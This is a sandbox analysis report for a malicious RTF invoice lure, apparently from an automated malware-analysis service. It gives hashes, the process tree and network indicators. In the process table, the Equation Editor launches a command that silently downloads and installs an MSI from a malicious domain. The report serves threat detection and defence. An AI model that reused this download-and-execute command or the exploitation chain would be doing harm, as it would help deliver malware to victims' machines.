| File name: | Prepayment over due invoices.doc |
|---|---|
| Full analysis: | https://app.any.run/tasks/4d86793a-5242-4078-93c0-87482ed34afa |
| Verdict: | Malicious activity |
| Analysis date: | May 20, 2019, 11:07:10 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | E357623D1AFC047C1918550FC12F53E1 |
| SHA1: | 7331B69AF184A55EF002487CDAFCFE7B408B300E |
| SHA256: | 38A7E7FF4692537127100742D620E58F5CD84631688636CC9E097F05287BD211 |
| SSDEEP: | 6144:IrlgcO1MPO48ns4EVSuAvg0p8444k444D444k444D444k444D444A447444s44M8:IXeMG8B0pjKbkl7Q2 |
| Detected type: | .rtf (Rich Text Format, 100) |
| Title: | Microsoft Research License Agreement |
|---|---|
| Author: | aphillip |
| LastModifiedBy: | ARIELHACKZ |
| CreateDate: | 2007:01:18 20:22:00 |
| ModifyDate: | 2019:04:16 11:26:00 |
| RevisionNumber: | 3 |
| TotalEditTime: | 1 minute |
| Pages: | 1 |
| Words: | - |
| Characters: | 1 |
| Company: | Microsoft Corporation |
| CharactersWithSpaces: | 1 |
| InternalVersionNumber: | 49247 |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Prepayment over due invoices.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3716 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
| 312 | cmd.exe & /C CD C: & msiexec.exe /i http://myfreeshopping.in/engine1/normalinvoice.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1619; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2748 | msiexec.exe /i http://myfreeshopping.in/engine1/normalinvoice.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Exit code: 1619; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| 4008 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1044.tmp.cvr | — | — | — |
| 456 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | AAE1F34939203117AC1F4B1DA330748D | A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74 |
| 456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$epayment over due invoices.doc | pgc | D04EA7FF52094A4010984D65E344976E | 57A51407832E29D8E820A857DDCA01D0C5566E366769C547E15594CB9AB18D28 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 4008 | msiexec.exe | GET | 404 | 208.91.198.131:80 | http://myfreeshopping.in/engine1/normalinvoice.msi | US | html | 272 b | malicious |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 4008 | msiexec.exe | 208.91.198.131:80 | myfreeshopping.in | PDR | US | malicious |
| Domain | IP | Reputation |
|---|---|---|
| myfreeshopping.in | | malicious |
| PID | Process | Class | Message |
|---|---|---|---|
| 4008 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |